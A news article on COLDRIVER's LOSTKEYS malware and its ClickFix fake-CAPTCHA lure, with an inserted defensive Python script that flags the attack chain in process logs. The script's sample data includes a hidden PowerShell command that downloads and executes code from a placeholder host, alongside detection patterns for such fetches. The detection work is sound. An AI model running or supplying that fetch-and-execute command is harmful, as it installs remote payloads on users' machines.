Russian Hackers Deploy New LOSTKEYS Malware Using ClickFix Tactics

The Russian-linked hacking group COLDRIVER is ramping up its cyber espionage efforts by distributing a new malware strain known as LOSTKEYS. The malware is delivered through a social engineering lure that resembles the ClickFix technique. According to the Google Threat Intelligence Group, LOSTKEYS has been observed targeting current and former advisors to Western governments, military personnel, journalists, think tanks, and non-governmental organizations (NGOs). Individuals linked to Ukraine have also been identified as potential targets.

LOSTKEYS is designed to steal files matching a predetermined list of file types and directories, and it also collects system information for the attackers. The malware was detected in attacks occurring in January, March, and April of 2025, as noted in a recent report by Google. Security researcher Wesley Shields detailed that COLDRIVER's operation originally specialized in credential theft but has now expanded to include this more advanced form of malware deployment.

COLDRIVER's tactics have evolved from its initial credential phishing campaigns, diversifying into custom malware attacks. The latest operations begin with a fake CAPTCHA verification on a decoy website, where victims are directed to execute a PowerShell command that downloads the malware from a remote server. The use of ClickFix suggests the group is refining its attack methods, with evading detection in virtual machines appearing to be a particular focus.
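As an added example (not code from Google's report or from this article), the check below shows the kind of detection logic a defender might run over process-creation telemetry to catch the chain just described: a PowerShell host started interactively from explorer.exe (as happens when a user pastes a command into the Run dialog) whose command line fetches content from a remote server. The log records, field names and the example.invalid host are constructed for illustration.

```python
import re

# Constructed sample process-creation records (Sysmon Event ID 1 style fields); illustrative only.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iwr http://example.invalid/v | iex"'},
    {"ParentImage": r"C:\Program Files\Agent\agent.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -File C:\\scripts\\inventory.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell Get-Date"},
]

# A ClickFix lure ends with the user pasting a command into the Run dialog,
# so the script host is a child of explorer.exe rather than of a management tool.
INTERACTIVE_PARENTS = ("explorer.exe",)
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe")
# Remote-fetch indicators: the pasted command pulls the next stage from a server.
REMOTE_FETCH = re.compile(
    r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|net\.webclient|https?://", re.I)
# Flags that hide the window or weaken policy: supporting evidence, not sufficient alone.
EVASION = re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-noprofile|-enc\w*\s|bypass|\biex\b", re.I)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """Return (score, reasons). A score of 2 or more matches the ClickFix pattern."""
    reasons = []
    host = basename(ev["Image"]) in SCRIPT_HOSTS
    if host and basename(ev["ParentImage"]) in INTERACTIVE_PARENTS:
        reasons.append("script host launched interactively from explorer.exe")
    if host and REMOTE_FETCH.search(ev["CommandLine"]):
        reasons.append("command line fetches content from a remote server")
    if host and EVASION.search(ev["CommandLine"]):
        reasons.append("hidden-window / policy-bypass / in-memory execution flag")
    return len(reasons), reasons


def detect_clickfix(events, threshold=2):
    """Return the records scoring at or above the threshold, with their reasons."""
    hits = []
    for i, ev in enumerate(events):
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append({"index": i, "score": score, "reasons": reasons})
    return hits
```

Only the first record is flagged: an interactive PowerShell launch on its own (third record) scores 1, and a scripted launch from a management agent (second record) scores 0, which keeps routine administration from paging the SOC.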

Reports indicate that this targeted deployment of LOSTKEYS is part of a broader trend, as other threat actors have also adopted the ClickFix strategy to distribute various malware types, including a banking trojan named Lampion and a macOS information stealer known as Atomic Stealer. The ClickFix technique’s continued popularity among cybercriminals underscores the importance of vigilance in cybersecurity practices.